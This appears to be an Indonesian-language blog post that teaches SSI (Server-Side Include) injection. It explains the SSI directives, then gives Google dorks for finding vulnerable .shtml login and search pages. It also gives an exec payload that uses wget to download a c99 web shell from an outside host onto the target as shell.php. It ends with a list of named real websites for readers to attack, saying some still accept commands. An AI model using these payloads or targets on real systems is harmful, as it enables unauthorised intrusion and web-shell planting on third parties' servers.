SSI Injection (Server-side Include) adalah tehnik exploit server side yang mengizinkan attacker untuk mengirim perintah yang nanti nya akan di eksekusi oleh web server
SSI Injection memanfaatkan kegagalan aplikasi web untuk membersihkan data yang disediakan pengguna sebelum mereka dimasukkan ke dalam server-side ditafsirkan file HTML
Sever Side Includes Termasuk serangan memungkinkan eksploitasi aplikasi web dengan menginjeksi skrip dalam halaman HTML atau mengeksekusi kode arbitrary codes remotely.
Kalau di Php untuk memulai dan menutup kita gunakan <? dan ?>
kalau SSI <!-- -->
Include PHP
Code:
<? include "file.html"; ?>
Include SSI
Code:
<!-- #include virtual="file.html" -->
SSI untuk mengeskekusi perintah CLI
Code:
<!-- #exec cmd="ls -A" -->
CGI
Code:
<!-- #exec cgi="/cgi-bin/any_script.cgi" -->
biasanya halaman yang menggunakan SSI itu berformat
.shtml / .shtm / .stm
Sudah perkenalan dengan ssi mari kita melakukan exploitasi ..
Kita bisa gunakan
inurl:bin/Cklb/ - Best Dork
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
<!-- #echo var="HTTP_USER_AGENT" -->
<!-- #exec cmd="wget http://www.sh3ll.org/c99.txt? -O shell.php" -->
sitetarget.com/shell.php
anda bisa coba di sini ... walau sih di situ udah di fix .. tapi beberapa perintah masih bisa
http://www.cgibackgrounds.com/bin/Cklb
http://www.stockshop.com/bin/Cklb
http://www.fogstock.com/bin/Cklb
http://www.glasshouseimages.com/user/login.shtml
http://www.wppionlinecontest.com/user/login.shtml
http://www.cgibackgrounds.com/user/login.shtml
http://www.getstock.com/user/login.shtml
http://www.estostock.com/user/login.shtml
http://www.blendimages.com/user/login.shtml
http://www.pdnthelook.com/user/login.shtml
http://iloveimages.com/user/login.shtml
http://www.win-initiative.com/user/login.shtml (view source to see output)
http://thegatheringsphotocontest.com/user/login.shtml
Sumber :
https://www.owasp.org/index.php/Testing_...SP-DV-009)
penjelasannya agak berantakan ya soalnya dari bahasa ingriss ane translate manual :v .
Comments[ 0 ]
Post a Comment